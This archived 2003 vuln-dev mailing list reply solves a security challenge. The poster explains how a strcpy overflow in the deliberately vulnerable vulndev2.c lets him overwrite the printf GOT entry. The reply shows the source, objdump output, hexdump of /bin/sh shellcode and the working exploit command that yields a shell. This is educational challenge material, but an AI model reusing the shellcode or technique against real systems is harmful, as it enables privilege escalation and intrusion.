|
|
| Applications |
| Mailing Lists |
| Miscellaneous |
| Operating Systems |
| Programming |
Re: [Vuln-dev Challenge] Challenge #2
Date: Sat May 24 2003 - 01:05:54 EDT
Strategy was to overwrite printf pointer with shellcode address.
- Overwrite pointer held in bfp with strcpy(buf, argv[1]).
before:
[buf][bfp][ret]
after:
[buf][&printf - 2][ret]
Subtract 2 from printf addr to compensate for ";;%s;;" in fprintf
2) Overwrite printf function pointer with argv[2], fgets(bfp, BFSIZE, f1), f1 contains address of argv[1] or buf.
3) printf is then called which gives a shell.
Note that a BUFSIZE of 90 actually allocates 92 bytes on the stack.
/* vulndev2.c */
#include <stdio.h>
#include <stdlib.h>
#define BFSIZE 90
int
main(int argc, char *argv[])
{
char *bfp;
char buf[BFSIZE];
FILE *f1;
if (argc != 3)
return 1;
if ( (bfp = malloc(BFSIZE)) == NULL)
return 1;
/* debug */
printf("bfp = %p, buf = %p\n", bfp, buf);
/* log input */
if ( (f1 = fopen("db.log", "a+")) == NULL)
return 1;
fprintf(f1, ";;%s;;", argv[2]);
fclose(f1);
strcpy(buf, argv[1]);
/* read log */
if ( (f1 = fopen("db.log", "r")) == NULL)
return 1;
if (fgets(bfp, BFSIZE, f1) == NULL)
return 1;
printf("%s\n", bfp);
fclose(f1);
exit(1);
}
##
jroyes@tadpole:~/study/vuln-dev/cha2$ objdump -R vd2
vd2: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049874 R_386_GLOB_DAT __gmon_start__ 08049848 R_386_JUMP_SLOT __register_frame_info 0804984c R_386_JUMP_SLOT fprintf 08049850 R_386_JUMP_SLOT malloc 08049854 R_386_JUMP_SLOT __deregister_frame_info 08049858 R_386_JUMP_SLOT fgets 0804985c R_386_JUMP_SLOT __libc_start_main 08049860 R_386_JUMP_SLOT printf 08049864 R_386_JUMP_SLOT fclose 08049868 R_386_JUMP_SLOT exit 0804986c R_386_JUMP_SLOT fopen 08049870 R_386_JUMP_SLOT strcpy
jroyes@tadpole:~/study/vuln-dev/cha2$ hexdump -C tiny.shell
00000000 31 db 31 c9 b0 46 cd 80 31 c0 50 68 2f 73 68 ff |1.1..F..1.Ph/sh.| 00000010 88 44 24 03 68 2f 62 69 6e 89 e3 50 53 89 e1 31 |.D$.h/bin..PS..1| 00000020 d2 b0 0b cd 80 |.....|00000025
jroyes@tadpole:~/study/vuln-dev/cha2$ ./vd2 `perl -e 'print "A"x55'``cat tiny.shell``printf "\x5e\x98\x04\x08"` `printf "\x6c\xfa\xff\xbf"` bfp = 0x8049898, buf = 0xbffffa6c
sh-2.05a$ exit
jroyes@tadpole:~/study/vuln-dev/cha2$
##
Thanks to sin for the tiny shellcode.
On Fri, 2003-05-23 at 18:13, Dave McKinney wrote:
> > We are announcing the second challenge. Initially, we wanted to have this > out a few days ago but were involved in testing it on multiple platforms. > This challenge is a little easier than the first one, since we'd like to > see more people attempting to produce a proof-of-concept. If you find it > too easy, you're welcome to attempt it in an environment with a > non-executable stack/heap to raise the bar a little. > > Here's a link to the basic guidelines (for those who missed it): > > http://www.securityfocus.com/archive/82/321615/2003-05-13/2003-05-19/0 > > (also, please retain the [Vuln-dev Challenge] string in the subject line > for replies to make for easier filtering for those not interested in > challenge related discussion.) > > --- > > /* vulndev2.c */ > > #include> #include > > #define BFSIZE 90 > > int > main(int argc, char *argv[]) > { > char *bfp; > char buf[BFSIZE]; > FILE *f1; > > if (argc != 3) > return 1; > if ( (bfp = malloc(BFSIZE)) == NULL) > return 1; > > /* log input */ > if ( (f1 = fopen("db.log", "a+")) == NULL) > return 1; > fprintf(f1, ";;%s;;", argv[2]); > fclose(f1); > > strcpy(buf, argv[1]); > > /* read log */ > if ( (f1 = fopen("db.log", "r")) == NULL) > return 1; > if (fgets(bfp, BFSIZE, f1) == NULL) > return 1; > > printf("%s\n", bfp); > fclose(f1); > exit(1); > } > > --- > > Dave McKinney > Symantec > > keyID: BF919DD7 > key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7
-- Jason Royes Data Access Experts http://www.da-experts.com/Received on Sat May 24 17:04:58 2003
This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT
|
Contact Us Legal Notices Order Services Online Pantek Home Privacy Policy IT news Site Map Pantek Library |